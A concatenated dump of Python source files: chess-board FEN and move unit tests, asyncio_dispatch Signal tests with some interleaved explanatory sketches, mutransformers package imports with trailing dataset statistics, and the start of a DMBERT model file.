'..p.....',
'....P...',
'.....N..',
'PPPP.PPP',
'RNBQKB.R'
])
def test_setup_position_without_pieces(self):
board = pychess.board.SetupBoard('4k3/pppppppp/8/8/8/8/PPPPPPPP/4K3 w - - 0 1')
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['....k...',
'pppppppp',
'........',
'........',
'........',
'........',
'PPPPPPPP',
'....K...'
])
def test_setup_position_missing_King(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('4k3/pppppppp/8/8/8/8/PPPPPPPP/8 w - - 0 1')
def test_put_piece(self):
board = pychess.board.SetupBoard('4k3/pppppppp/8/8/8/8/PPPPPPPP/4K3 w KQkq - 0 1')
color = pychess.PieceColor.WHITE
first_rank = board.get_first_rank(color)
board.put_piece(pychess.pieces.Rook(board, (0, first_rank), color))
board.put_piece(pychess.pieces.Knight(board, (1, first_rank), color))
board.put_piece(pychess.pieces.Bishop(board, (2, first_rank), color))
board.put_piece(pychess.pieces.Queen(board, (3, first_rank), color))
board.put_piece(pychess.pieces.Bishop(board, (5, first_rank), color))
board.put_piece(pychess.pieces.Knight(board, (6, first_rank), color))
board.put_piece(pychess.pieces.Rook(board, (7, first_rank), color))
color = pychess.PieceColor.BLACK
first_rank = board.get_first_rank(color)
board.put_piece(pychess.pieces.Rook(board, (0, first_rank), color))
board.put_piece(pychess.pieces.Knight(board, (1, first_rank), color))
board.put_piece(pychess.pieces.Bishop(board, (2, first_rank), color))
board.put_piece(pychess.pieces.Queen(board, (3, first_rank), color))
board.put_piece(pychess.pieces.Bishop(board, (5, first_rank), color))
board.put_piece(pychess.pieces.Knight(board, (6, first_rank), color))
board.put_piece(pychess.pieces.Rook(board, (7, first_rank), color))
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['rnbqkbnr',
'pppppppp',
'........',
'........',
'........',
'........',
'PPPPPPPP',
'RNBQKBNR'
])
def test_put_piece_too_many_Kings(self):
board = pychess.board.SetupBoard()
board.put_piece(pychess.pieces.King(board, (0, 0), pychess.PieceColor.WHITE))
board.put_piece(pychess.pieces.King(board, (7, 7), pychess.PieceColor.BLACK))
with self.assertRaises(ValueError):
# putting one too many pychess.pieces.Kings on the board should raise an Error
board.put_piece(pychess.pieces.King(board, (7, 0), pychess.PieceColor.WHITE))
def test_put_piece_Kings_too_close(self):
board = pychess.board.SetupBoard()
board.put_piece(pychess.pieces.King(board, (0, 0), pychess.PieceColor.WHITE))
with self.assertRaises(ValueError):
            # putting a King too close to the other King should raise an Error
board.put_piece(pychess.pieces.King(board, (0, 1), pychess.PieceColor.BLACK))
def test_put_piece_missing_King(self):
with self.assertRaises(ValueError):
            # omitting one of the Kings should raise an Error
board = pychess.board.SetupBoard('4k3/pppppppp/8/8/8/8/PPPPPPPP/8 w KQkq - 0 1')
print(pychess.util.board.to_string_array(board))
def test_put_piece_Pawn_on_last_rank(self):
board = pychess.board.SetupBoard()
with self.assertRaises(ValueError):
            # putting a Pawn on its last rank should raise an Error
board.put_piece(pychess.pieces.Pawn(board, (0, board.get_last_rank(pychess.PieceColor.WHITE)),
pychess.PieceColor.WHITE))
def test_put_piece_occupied(self):
board = pychess.board.SetupBoard('rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1')
with self.assertRaises(ValueError):
            # putting a Pawn on an already occupied square should raise an Error
board.put_piece(pychess.pieces.Pawn(board, (0, 0), pychess.PieceColor.WHITE))
def test_Pawn_en_passant_setup_wP(self):
board = pychess.board.SetupBoard('rnbqkbnr/pppp1ppp/8/3PpP2/8/8/PPP2PPP/RNBQKBNR w KQkq e6')
pawns = board.get_pawns(pychess.PieceColor.WHITE)
moves = []
for p in pawns:
for m in p.moves():
moves.append(m.to_algebraic())
en_passant_moves = ['dxe6', 'fxe6']
en_passants_found = []
for em in en_passant_moves:
if em in moves:
en_passants_found.append(em)
self.assertCountEqual(en_passant_moves, en_passants_found)
def test_Pawn_en_passant_setup_bP(self):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3pPp2/8/PPPP1PPP/RNBQKBNR b KQkq e3')
pawns = board.get_pawns(pychess.PieceColor.BLACK)
moves = []
for p in pawns:
for m in p.moves():
moves.append(m.to_algebraic())
en_passant_moves = ['dxe3', 'fxe3']
en_passants_found = []
for em in en_passant_moves:
if em in moves:
en_passants_found.append(em)
self.assertCountEqual(en_passant_moves, en_passants_found)
def test_corrupt_fen_1(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/pppppppp/8/8/8/8/PPPPPPP')
def test_corrupt_fen_2(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3pPp2/8/PPPP1PPP/RNBQKBNR ? KQkq e3')
def test_corrupt_fen_3(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3pPp2/8/PPPP1PPP/RNBQKBNR w KQkq A3')
def test_corrupt_fen_4(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3pPp2/8/PPPP1PPP/RNBQKBNR w KQkq ??')
def test_corrupt_fen_5(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3p1p2/8/PPPPPPPP/RNBQKBNR b KQkq e3')
def test_corrupt_fen_6(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3pNp2/8/PPPP1PPP/RNBQKBNR b KQkq e3')
def test_corrupt_fen_7(self):
with self.assertRaises(ValueError):
board = pychess.board.SetupBoard('rnbqkbnr/ppp1p1pp/8/8/3ppp2/8/PPPP1PPP/RNBQKBNR b KQkq e3')
if __name__ == '__main__':
unittest.main()
# asyncio_dispatch/tests/test_dispatcher.py (lenzenmi/asyncio_dispatch, MIT)
'''
Created on Apr 23, 2015
@author: mike
'''
import unittest
from unittest.mock import Mock
import asyncio
import gc
from .helpers import FunctionMock, CoroutineMock
from ..dispatcher import Signal
class TestSignal(unittest.TestCase):
def setUp(self):
self.loop = asyncio.get_event_loop()
def tearDown(self):
pass
def test_connect_send_all_no_args(self):
callback = FunctionMock()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callback)),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(tasks[1].result(), 1)
self.assertEqual(len(signal._all), 1)
self.assertEqual(len(signal._by_keys), 0)
self.assertEqual(len(signal._by_senders), 0)
callback.assert_called_with(signal=signal, senders=set(), keys=set())
def test_connect_send_all_no_args_multiple(self):
callbacks = [FunctionMock(), FunctionMock(), FunctionMock(), FunctionMock()]
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callbacks[0])),
self.loop.create_task(signal.connect(callbacks[1])),
self.loop.create_task(signal.connect(callbacks[2])),
self.loop.create_task(signal.connect(callbacks[3])),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(tasks[4].result(), 4)
self.assertEqual(len(signal._all), 4)
self.assertEqual(len(signal._by_keys), 0)
self.assertEqual(len(signal._by_senders), 0)
for callback in callbacks:
callback.assert_called_with(signal=signal, senders=set(), keys=set())
self.assertEqual(callback.call_count, 1)
def test_dissconnect_all_no_args_multiple(self):
callbacks = [FunctionMock(), FunctionMock(), FunctionMock(), FunctionMock()]
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(callbacks[0])),
self.loop.create_task(signal.connect(callbacks[1])),
self.loop.create_task(signal.connect(callbacks[2])),
self.loop.create_task(signal.connect(callbacks[3])),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(tasks[4].result(), 4)
self.assertEqual(len(signal._all), 4)
self.assertEqual(len(signal._by_keys), 0)
self.assertEqual(len(signal._by_senders), 0)
for callback in callbacks:
callback.assert_called_with(signal=signal, senders=set(), keys=set())
self.assertEqual(callback.call_count, 1)
tasks = [signal.disconnect(callbacks[0])]
self.loop.run_until_complete(asyncio.wait(tasks))
# Order is important
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
for callback in callbacks[1:]:
callback.assert_called_with(signal=signal, senders=set(), keys=set())
self.assertEqual(callback.call_count, 2)
self.assertEqual(callbacks[0].call_count, 1)
def test_weakref_all_no_args_multiple(self):
fn1 = FunctionMock()
fn2 = FunctionMock()
fn3 = FunctionMock()
fn4 = FunctionMock()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(fn1)),
self.loop.create_task(signal.connect(fn2)),
self.loop.create_task(signal.connect(fn3)),
self.loop.create_task(signal.connect(fn4)),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(len(signal._all), 4)
        del fn1
gc.collect()
# cleanup happens during disconnect and send only.
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(len(signal._all), 3)
def test_strongref_all_no_args_multiple(self):
fn1 = FunctionMock()
fn2 = FunctionMock()
fn3 = FunctionMock()
fn4 = FunctionMock()
signal = Signal(loop=self.loop)
tasks = [self.loop.create_task(signal.connect(fn1, weak=False)),
self.loop.create_task(signal.connect(fn2)),
self.loop.create_task(signal.connect(fn3)),
self.loop.create_task(signal.connect(fn4)),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(len(signal._all), 4)
        del fn1
gc.collect()
# Should not be garbage collected
tasks = [self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(len(signal._all), 4)
def test_send_all_with_args_default(self):
callback = FunctionMock()
kwargs = {'arg1': 1, 'arg2': 2}
signal = Signal(loop=self.loop, **kwargs)
tasks = [self.loop.create_task(signal.connect(callback)),
self.loop.create_task(signal.send())]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(tasks[1].result(), 1)
self.assertEqual(len(signal._all), 1)
self.assertEqual(len(signal._by_keys), 0)
self.assertEqual(len(signal._by_senders), 0)
callback.assert_called_with(signal=signal, senders=set(), keys=set(), arg1=1, arg2=2)
def test_send_all_with_args_changed(self):
callback = FunctionMock()
kwargs = {'arg1': 1, 'arg2': 2}
signal = Signal(loop=self.loop, **kwargs)
tasks = [self.loop.create_task(signal.connect(callback)),
# change the kwargs when run
self.loop.create_task(signal.send(arg1=2, arg2=3))]
self.loop.run_until_complete(asyncio.wait(tasks))
self.assertEqual(tasks[1].result(), 1)
self.assertEqual(len(signal._all), 1)
self.assertEqual(len(signal._by_keys), 0)
self.assertEqual(len(signal._by_senders), 0)
callback.assert_called_with(signal=signal, senders=set(), keys=set(), arg1=2, arg2=3)
def test_send_all_with_args_wrong(self):
callback = FunctionMock()
kwargs = {'arg1': 1, 'arg2': 2}
        signal = Signal(loop=self.loop, **kwargs)
        tasks = [self.loop.create_task(signal.connect(callback)),
                 # send with kwargs that do not match those declared on the Signal
                 self.loop.create_task(signal.send(wrong_arg=2, arg2=3))]
        coro = asyncio.wait(tasks)
        self.loop.run_until_complete(coro)
        # retrieving the result of the send task should raise ValueError
        self.assertRaises(ValueError, tasks[1].result)

    def test_send_sender_no_args(self):
        callback = FunctionMock()
        sender = object()
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
                 self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertFalse(callback.called)
        tasks = [self.loop.create_task(signal.send(sender=sender))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertEqual(callback.call_count, 1)

    def test_send_method_sender_no_args(self):
        callback = FunctionMock()

        class Test:
            def method(self):
                pass

        instance = Test()
        sender = instance.method
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
                 self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertFalse(callback.called)
        tasks = [self.loop.create_task(signal.send(sender=sender))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertEqual(callback.call_count, 1)

    def test_send_senders_no_args(self):
        callback1 = FunctionMock()
        callback2 = FunctionMock()
        sender1 = object()
        sender2 = object()
        sender3 = object()
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback1, senders=[sender1])),
                 self.loop.create_task(signal.connect(callback2, senders=[sender2, sender3])),
                 self.loop.create_task(signal.send(sender=sender1))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertEqual(callback1.call_count, 1)
        self.assertEqual(callback2.call_count, 0)
        tasks = [self.loop.create_task(signal.send(sender=sender2))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertEqual(callback1.call_count, 1)
        self.assertEqual(callback2.call_count, 1)
        tasks = [self.loop.create_task(signal.send(senders=[sender2, sender3]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertEqual(callback1.call_count, 1)
        self.assertEqual(callback2.call_count, 2)
        tasks = [self.loop.create_task(signal.send(senders=[sender1, sender3]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertEqual(callback1.call_count, 2)
        self.assertEqual(callback2.call_count, 3)

    def test_send_key_no_args(self):
        callback = FunctionMock()
        key = 'some-key'
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback, key=key)),
                 self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertFalse(callback.called)
        tasks = [self.loop.create_task(signal.send(key=key))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertEqual(callback.call_count, 1)

    def test_send_keys_no_args(self):
        callback1 = FunctionMock()
        callback2 = FunctionMock()
        key1 = 'key1'
        key2 = 'key2'
        key3 = 'key3'
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback1, keys=[key1])),
                 self.loop.create_task(signal.connect(callback2, keys=[key2, key3])),
                 self.loop.create_task(signal.send(key=key1))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertEqual(callback1.call_count, 1)
        self.assertEqual(callback2.call_count, 0)
        tasks = [self.loop.create_task(signal.send(key=key2))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertEqual(callback1.call_count, 1)
        self.assertEqual(callback2.call_count, 1)
        tasks = [self.loop.create_task(signal.send(keys=[key2, key3]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertEqual(callback1.call_count, 1)
        self.assertEqual(callback2.call_count, 2)
        tasks = [self.loop.create_task(signal.send(keys=[key1, key3]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        self.assertEqual(callback1.call_count, 2)
        self.assertEqual(callback2.call_count, 3)

    def test_disconnect_all(self):
        callback = FunctionMock()
        key = 'some-key'
        key2 = 'some-key2'
        sender = object()
        sender2 = object()
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback)),
                 self.loop.create_task(signal.connect(callback, sender=sender)),
                 self.loop.create_task(signal.connect(callback, senders=[sender, sender2])),
                 self.loop.create_task(signal.connect(callback, key=key)),
                 self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        # disconnect from all signals
        tasks = [self.loop.create_task(signal.disconnect(callback))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send()),
                 self.loop.create_task(signal.send(sender=sender)),
                 self.loop.create_task(signal.send(senders=[sender, sender2])),
                 self.loop.create_task(signal.send(key=key)),
                 self.loop.create_task(signal.send(keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertFalse(callback.called)

    def test_disconnect_sender(self):
        callback = FunctionMock()
        key = 'some-key'
        key2 = 'some-key2'
        sender = object()
        sender2 = object()
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
                 self.loop.create_task(signal.connect(callback, senders=[sender, sender2])),
                 self.loop.create_task(signal.connect(callback, key=key)),
                 self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        # disconnect the callback for this sender only
        tasks = [self.loop.create_task(signal.disconnect(callback, sender=sender))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send(sender=sender))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertFalse(callback.called)
        tasks = [self.loop.create_task(signal.send(senders=[sender, sender2])),
                 self.loop.create_task(signal.send(key=key)),
                 self.loop.create_task(signal.send(keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(callback.call_count, 3)

    def test_disconnect_senders(self):
        callback = FunctionMock()
        key = 'some-key'
        key2 = 'some-key2'
        sender = object()
        sender2 = object()
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
                 self.loop.create_task(signal.connect(callback, senders=[sender, sender2])),
                 self.loop.create_task(signal.connect(callback, key=key)),
                 self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        # disconnect the callback for the listed senders only
        tasks = [self.loop.create_task(signal.disconnect(callback, senders=[sender]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send(sender=sender))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertFalse(callback.called)
        tasks = [self.loop.create_task(signal.send(senders=[sender, sender2])),
                 self.loop.create_task(signal.send(key=key)),
                 self.loop.create_task(signal.send(keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(callback.call_count, 3)

    def test_disconnect_key(self):
        callback = FunctionMock()
        key = 'some-key'
        key2 = 'some-key2'
        sender = object()
        sender2 = object()
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
                 self.loop.create_task(signal.connect(callback, senders=[sender, sender2])),
                 self.loop.create_task(signal.connect(callback, key=key)),
                 self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        # disconnect the callback for this key only
        tasks = [self.loop.create_task(signal.disconnect(callback, key=key))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send(key=key))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertFalse(callback.called)
        tasks = [self.loop.create_task(signal.send(senders=[sender, sender2])),
                 self.loop.create_task(signal.send(sender=sender)),
                 self.loop.create_task(signal.send(keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(callback.call_count, 3)

    def test_disconnect_keys(self):
        callback = FunctionMock()
        key = 'some-key'
        key2 = 'some-key2'
        sender = object()
        sender2 = object()
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback, sender=sender)),
                 self.loop.create_task(signal.connect(callback, senders=[sender, sender2])),
                 self.loop.create_task(signal.connect(callback, key=key)),
                 self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        # disconnect the callback for the listed keys only
        tasks = [self.loop.create_task(signal.disconnect(callback, keys=[key]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send(key=key))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertFalse(callback.called)
        tasks = [self.loop.create_task(signal.send(senders=[sender, sender2])),
                 self.loop.create_task(signal.send(sender=sender)),
                 self.loop.create_task(signal.send(keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(callback.call_count, 3)

    def test_weakref_sender(self):
        callback = FunctionMock()
        sender = object()
        sender2 = object()
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback, senders=[sender, sender2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        # delete the callback and force a garbage collection
        del callback
        gc.collect()
        # dead weak references are pruned during a send
        tasks = [self.loop.create_task(signal.send(senders=[sender, sender2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(len(signal._by_senders), 0)
        self.assertEqual(len(signal._locks_senders), 0)

    def test_weakref_keys(self):
        callback = FunctionMock()
        key = 'key1'
        key2 = 'key2'
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback, keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        # delete the callback and force a garbage collection
        del callback
        gc.collect()
        # dead weak references are pruned during a send
        tasks = [self.loop.create_task(signal.send(keys=[key, key2]))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(len(signal._by_keys), 0)
        self.assertEqual(len(signal._locks_keys), 0)
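# The two weakref tests above rely on the Signal holding callbacks weakly and
# pruning dead references while handling a send. A minimal stdlib sketch of that
# mechanism follows; `TinySignal` and `demo` are illustrative names only, not the
# actual Signal implementation under test:

```python
import gc
import weakref


class TinySignal:
    """Sketch: store callbacks as weak references, prune dead ones on send."""

    def __init__(self):
        self._callbacks = []  # list of weakref.ref objects

    def connect(self, callback):
        self._callbacks.append(weakref.ref(callback))

    def send(self, **kwargs):
        alive = []
        for ref in self._callbacks:
            cb = ref()
            if cb is not None:        # referent still alive
                cb(**kwargs)
                alive.append(ref)
        self._callbacks = alive       # dead refs dropped during the send


def demo():
    calls = []

    def cb(**kw):
        calls.append(kw)

    sig = TinySignal()
    sig.connect(cb)
    sig.send(x=1)                     # delivered
    del cb
    gc.collect()
    sig.send(x=2)                     # dead ref is pruned, nothing delivered
    return calls, len(sig._callbacks)
```

# Note that a weakref to a *bound method* dies immediately unless wrapped in
# `weakref.WeakMethod`, which is likely why the real Signal needs special handling
# for the method-callback cases tested above.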

    def test_send_method(self):
        class Test:
            call_count = 0

            def method(self, *args, **kwargs):
                self.call_count += 1

        instance = Test()
        callback = instance.method
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(instance.call_count, 1)

    def test_send_coro(self):
        coro_callback = CoroutineMock()
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(coro_callback))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(coro_callback.call_count, 1)

    def test_send_coro_args(self):
        coro_callback = CoroutineMock()
        kwargs = {'arg1': 1, 'arg2': 2}
        signal = Signal(loop=self.loop, **kwargs)
        tasks = [self.loop.create_task(signal.connect(coro_callback))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send(**kwargs))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(coro_callback.call_count, 1)
        coro_callback.assert_called_with(signal=signal, keys=set(), senders=set(),
                                         **kwargs)

    def test_send_method_coro(self):
        class Test:
            call_count = 0

            @asyncio.coroutine
            def method(self, *args, **kwargs):
                self.call_count += 1

        instance = Test()
        coro_callback = instance.method
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(coro_callback))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(instance.call_count, 1)

    def test_exception(self):
        # test that our exception is being raised
        exception_handler = Mock()
        self.loop.set_exception_handler(exception_handler)
        callback = FunctionMock()
        callback.side_effect = Exception('BOOM!')
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertTrue(callback.called)
        self.assertTrue(exception_handler.called)
        # reset our exception handler
        self.loop.set_exception_handler(None)

    def test_exception_coro(self):
        # test that our exception is being raised
        exception_handler = Mock()
        self.loop.set_exception_handler(exception_handler)
        callback_coro = CoroutineMock()
        callback_coro.side_effect = Exception('BOOM!')
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback_coro))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertTrue(callback_coro.called)
        self.assertTrue(exception_handler.called)
        # reset our exception handler
        self.loop.set_exception_handler(None)

    def test_static_method(self):
        # test that a static method works as a callback
        count = 0

        class Test:
            @staticmethod
            def method(*args, **kwargs):
                nonlocal count
                count += 1

        callback = Test.method
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(count, 1)

    def test_static_method_coro(self):
        # test that a static coroutine method works as a callback
        count = 0

        class Test:
            @staticmethod
            @asyncio.coroutine
            def method(*args, **kwargs):
                nonlocal count
                count += 1

        callback = Test.method
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(count, 1)

    def test_class_method(self):
        # test that a class method works as a callback
        class Test:
            count = 0

            @classmethod
            def method(cls, *args, **kwargs):
                cls.count += 1

        callback = Test.method
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(Test.count, 1)

    def test_class_method_coro(self):
        # test that a class coroutine method works as a callback
        class Test:
            count = 0

            @classmethod
            @asyncio.coroutine
            def method(cls, *args, **kwargs):
                cls.count += 1

        callback = Test.method
        signal = Signal(loop=self.loop)
        tasks = [self.loop.create_task(signal.connect(callback))]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        tasks = [self.loop.create_task(signal.send())]
        self.loop.run_until_complete(asyncio.wait(tasks))
        for task in tasks:
            task.result()
        self.assertEqual(Test.count, 1)

    def test_restricted_keywords(self):
        keywords = ('callback', 'key', 'keys', 'sender', 'senders', 'weak')
        for key in keywords:
            kwargs = {key: 'value'}
            self.assertRaises(ValueError, Signal, **kwargs)
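# test_restricted_keywords expects the Signal constructor to reject default
# kwargs whose names collide with its own parameters. A minimal sketch of such a
# check; `validate_default_kwargs` is a free function here purely for
# illustration, not the library's actual API:

```python
RESTRICTED = ('callback', 'key', 'keys', 'sender', 'senders', 'weak')


def validate_default_kwargs(**kwargs):
    """Reject defaults that would shadow Signal's own parameter names."""
    for name in kwargs:
        if name in RESTRICTED:
            raise ValueError('%r is a restricted keyword' % name)
    return kwargs
```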

if __name__ == "__main__":
    # import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
# ---- mutransformers/__init__.py (repo: microsoft/mutransformers, license: MIT) ----
from mutransformers.models.bert.modeling_bert import *
from mutransformers.models.bert.configuration_bert import *
from mutransformers.models.roberta.modeling_roberta import *
from mutransformers.models.roberta.configuration_roberta import *
from mutransformers.models.gpt2.modeling_gpt2 import *
from mutransformers.models.gpt2.configuration_gpt2 import * | 59.333333 | 65 | 0.867978 | 42 | 356 | 7.214286 | 0.214286 | 0.356436 | 0.475248 | 0.49505 | 0.640264 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012012 | 0.064607 | 356 | 6 | 66 | 59.333333 | 0.897898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
# ---- baselines/DMBERT/model.py (repo: LyricZhao/MAVEN-dataset, license: MIT) ----
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import CrossEntropyLoss
